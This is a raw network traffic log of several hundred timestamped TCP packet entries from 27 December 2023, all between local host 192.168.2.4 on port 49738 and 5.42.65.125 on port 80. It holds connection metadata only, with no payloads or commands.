Dec 27, 2023 18:12:24.701657057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.701728106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.701769114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.701781988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.701818943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.701822042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.701834917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.701848030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.701858997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.701880932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.701890945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.702646017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.702692986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.702733040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.702766895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.702780008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.702786922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.702794075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.702805996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.702816963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.702841043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.702868938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.703584909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.703597069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.703685045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.703696966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.703707933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.703718901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.703728914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.703731060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.703761101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.704503059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.704514980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.704550028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.704601049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.704612970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.704624891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.704634905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.704634905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.704647064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.704660892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.704685926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.705395937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.705560923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.705573082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.705596924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.705641985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.705653906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.705692053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.706051111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.706101894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.706124067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.706135988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.706146955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.706168890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.706181049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.706202984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.706820965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.706840992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.706854105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.706864119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.706876040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.706893921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.706906080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.709500074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.709572077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.709614038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.709629059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.709661961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.709743023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.709755898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.709767103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.709779024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.709789991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.709798098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.709803104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.709804058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.709837914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.710469007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.710555077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.710566998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.710578918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.710589886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.710602045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.710606098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.710613966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.710624933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.710640907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.711411953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.711447001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.711451054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.711544037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.711585999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.711623907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.711636066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.711647987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.711658955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.711673975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.711699963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.712363005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.712374926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.712385893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.712397099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.712409019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.712419033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.712419033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.712430000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.712433100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.712450027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.713793993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.713807106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.713852882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.713931084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.713943005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.713954926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.713974953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.714003086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.715449095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.715570927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.715583086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.715593100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.715605021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.715619087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.715645075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.717214108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.717225075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.717259884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.717560053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.717570066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.717597008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.717617035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.717628002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.717628956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.717705965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.717716932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.717726946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.717739105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.717749119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.717755079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.717777967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.717792034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.718482971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.718554974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.718588114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.718600035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.718626976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.718677044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.718983889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.718996048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.719027042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.719038963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.719043970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.719055891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.719078064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.719677925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.719691038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.719717979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.719799042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.719811916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.719822884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.719854116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.720540047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.720576048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.720627069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.720763922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.720776081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.720788002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.720813036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.721412897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.721458912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.721471071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.721510887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.721515894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.721523046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.721565962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.722033024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.722045898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.722081900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.722105980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.722117901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.722129107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.722167969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.722610950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.722651005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.722712040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.722762108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.723079920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.723094940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.723119020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.723146915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.723442078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.723604918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.723617077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.723649025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.723822117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.723834038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.723860025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.726022005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.726035118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.726062059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.726129055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.726171970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.726174116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.726186991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.726202011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.726234913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.726255894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.726268053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.726278067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.726289988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.726317883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.726345062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.727216959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.727230072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.727241993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.727252960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.727257013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.727264881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.727276087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.727302074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.727809906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.727907896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.727921009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.727932930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.727945089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.727967978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.728439093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.728451967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.728468895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.728478909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.728485107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.728490114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.728506088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.728519917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.728857040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.728871107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.728914976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.728931904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.729011059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.729022980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.729052067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.729628086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.729669094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.729674101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.729834080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.729846954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.729859114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.729885101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.729912043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.730420113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.730432987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.730477095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.730492115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.730504990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.730551958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.730568886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.731417894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.731522083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.731544018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.731621027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.731633902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.731645107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.731657982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.731682062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.731949091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.732017040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.732054949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.732213020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.732225895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.732238054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.732273102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.733767033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.733823061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.733839035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.733851910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.733864069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.733875990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.733936071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.734157085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.734169960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.734181881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.734194040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.734208107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.734213114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.734244108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.738835096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.738984108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.739036083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.739038944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.739052057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.739075899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.739224911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.739276886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.739289045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.739300966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.739311934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.739353895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.739703894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.739737034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.739751101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.739830971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.739842892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.739854097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.739865065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.739876032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.739881992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.739919901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.741000891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.741014004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.741050959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.741161108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.741173029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.741184950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.741205931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.741424084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.741446972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.741458893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.741483927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.741491079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.741491079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.741503000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.741545916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.742183924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.742260933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.742273092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.742284060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.742295980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.742319107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.742768049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.742783070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.742830038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.742834091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.742846012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.742878914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.743050098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.743089914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.743091106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.743313074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.743324041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.743335009 CET	80	49738	5.42.65.125	192.168.2.4
